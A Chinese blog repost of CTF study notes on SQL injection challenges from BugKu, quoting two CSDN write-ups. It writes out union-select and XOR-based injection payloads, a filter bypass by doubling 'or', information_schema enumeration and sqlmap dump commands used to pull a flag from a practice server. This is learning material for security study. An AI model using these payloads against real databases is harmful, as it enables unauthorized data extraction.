码迷,mamicode.com
首页 > 数据库 > 详细

[web]sql

时间:2018-10-20 19:51:10      阅读:162      评论:0      收藏:0      [点我收藏+]

标签:amp   union   遍历   base   错误   flag   数据库   ==   成绩   

索引: 

 

[成绩单] [login1][多次]

其他150+的web题目

=============================

首先,我们通过[多次]这个题目来学习一下

url藏着id 那么id=1 根据提示也猜存在sql注入

SQL里没有双引号用法,数据类型为字符时用单引号

---------不知道为什么  先记住吧。。

id=1后面加单引号会报错,后面加--+注释返回正常,确定存在SQL注入

【id=1‘ 是不行的  id=1=1--+是可以的(不知道为什么)】

然后试了一下  or这俩是错误 ,但oorr可以(存在过滤,可以进行双写)

那么我们用【异或注入来处理一下】

http://120.24.86.145:9004/1ndex.php?id=1‘^(length(‘union‘)!=0)--+

忽然灵光一现。。。 所以说要多走走多活动活动啊,,,,

sql是恶意注入,分为:  

用了’,导致后面的语法变成了一串字符串(多神奇啊 ) 全都错了...

用了#之后,用了-- +之后.....

来源:

https://blog.csdn.net/johnlxj/article/details/82153355?utm_source=blogxgwz3

方法一:常规方法

进入这道题目 我们先手遍历一遍 id=-1‘ union select 1,2,3,4#

发现有四个表且都有回显

于是 就开始爆破吧

通过id=-1‘ union select 1,2,3,database()#得到数据库名字skctf_flag

之后通过 id=-1‘ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名fl4g,sc

很显然我们需要的数据在fl4g这个表里

接下来我们就要暴字段了

通过id=-1‘ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467#

得到字段skctf_flag

最后我们就可以开始查询数据了

通过id=-1‘ union select 1,2,3,skctf_flag from fl4g#

得到BUGKU{Sql_INJECT0N_4813drd8hz4}
--------------------- 

原文:https://blog.csdn.net/johnlxj/article/details/82153355 

还有就是

然后打开sqlmap开始爆库:sqlmap.py -r “C:\333.txt” -p id --current-db 
-r –> 加载一个文件 
-p –>指定参数 
–current-db –>获取当前数据库名称(current前有两个-) 


可以看到它的数据库为 ‘skctf_flag’,接着就是爆表 
sqlmap.py -r “C:\333.txt” -p id -D skctf_flag --tables 
-D –>指定数据库名称 
–tables –>列出数据库中的表(tables前有两个-) 


可以看到当前数据库中有两个表,很明显,flag应该在fl4g表中,下面就是该爆出表中的字段了 
sqlmap.py -r “C:\333.txt” -p id -D skctf_flag -T fl4g --columns 
-T –>指定表名称 
–columns –>列出表中的字段 


fl4g表中有一个名为skctf_flag字段,最后列出字段信息就可以啦。 
sqlmap.py -r “c:\333.txt” -p id -D skctf_flag -T fl4g -C skctf_flag --dump 
–dump –>列出字段数据(dump前有两个-) 

--------------------- 
作者:Tle_Camouflage 
来源:CSDN 
原文:https://blog.csdn.net/Tle_Camouflage/article/details/81978305 
版权声明:本文为博主原创文章,转载请附上博文链接!

==================

?id=1‘ union select 1,2,3,4 #

成绩单的题目直接使用这个注入,发现可以回显

然后下面的语句是用来搞出来系统里面备份的文件的....

以及....  ?id=1‘ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=‘skctf_flag‘#

 from information_schema.tables where table_schema=‘skctf_flag‘#

 

[web]sql

标签:amp   union   遍历   base   错误   flag   数据库   ==   成绩   

原文地址:https://www.cnblogs.com/lx2331/p/9822585.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!